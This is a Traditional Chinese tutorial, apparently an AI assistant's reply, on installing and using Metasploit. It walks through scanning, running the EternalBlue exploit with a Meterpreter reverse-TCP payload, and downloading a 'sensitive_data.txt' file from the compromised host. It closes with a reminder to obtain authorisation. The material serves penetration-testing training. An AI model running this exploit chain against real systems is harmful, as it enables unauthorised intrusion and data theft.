安裝 Metasploit
你可以使用 Metasploit 的安裝腳本從 Rapid7 官方站點下載安裝。
-
更新系統包:
sudo apt update
-
下載并安裝 Metasploit:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfupdate chmod 755 msfupdate sudo ./msfupdate
使用 Metasploit
安裝完成后,你可以通過以下步驟來使用 Metasploit。
-
啟動 Metasploit 控制臺:
msfconsole
啟動 Metasploit 控制臺后,你會看到類似以下的提示符:
msf6 >
-
基本命令
-
搜索漏洞和模塊:
search <keyword>
示例:
search apache
-
選擇一個模塊:
use <module>
示例:
use exploit/windows/smb/ms17_010_eternalblue
-
查看模塊信息:
info
-
設置模塊選項:
set <option> <value>
示例:
set RHOSTS 192.168.1.10 set LHOST 192.168.1.20
-
運行模塊:
run
-
-
掃描目標主機:
Metasploit 包含多個掃描器模塊,例如
auxiliary/scanner/
,你可以使用這些模塊掃描目標主機的漏洞。-
使用端口掃描模塊:
use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.1.10 set THREADS 10 run
-
使用漏洞掃描模塊:
use auxiliary/scanner/http/http_version set RHOSTS 192.168.1.10 run
-
-
利用漏洞:
一旦發現漏洞,可以使用相應的利用模塊進行攻擊。
-
選擇漏洞利用模塊:
use exploit/windows/smb/ms17_010_eternalblue
-
設置漏洞利用參數:
set RHOSTS 192.168.1.10 set LHOST 192.168.1.20 set PAYLOAD windows/x64/meterpreter/reverse_tcp
-
運行漏洞利用:
exploit
成功利用后,你可能會獲得目標系統的訪問權限,并進入 Meterpreter 會話。
-
-
使用 Meterpreter:
Meterpreter 是 Metasploit 提供的一個強大的后滲透攻擊工具。進入 Meterpreter 會話后,可以使用以下命令:
-
獲取系統信息:
sysinfo
-
獲取權限:
getuid getprivs
-
列出文件和目錄:
ls
-
下載文件:
download <remote_path> <local_path>
-
上傳文件:
upload <local_path> <remote_path>
-
執行命令:
execute -f <command>
-
關閉會話:
exit
-
示例
以下是一個使用 Metasploit 掃描和利用漏洞的完整示例:
-
啟動 Metasploit 控制臺:
msfconsole
-
搜索并使用漏洞掃描模塊:
search smb use auxiliary/scanner/smb/smb_version set RHOSTS 192.168.1.10 run
-
發現漏洞后,選擇漏洞利用模塊:
use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.10 set LHOST 192.168.1.20 set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit
-
進入 Meterpreter 會話并執行命令:
sysinfo ls download C:\\Users\\Admin\\Desktop\\sensitive_data.txt /tmp/sensitive_data.txt exit
通過這些步驟,你可以使用 Metasploit 進行漏洞掃描和利用,并執行后滲透攻擊。請注意,使用 Metasploit 等工具進行滲透測試時,應獲得目標系統的合法授權,以確保操作的合法性和道德性。如果你需要進一步的幫助或有其他問題,請告訴我。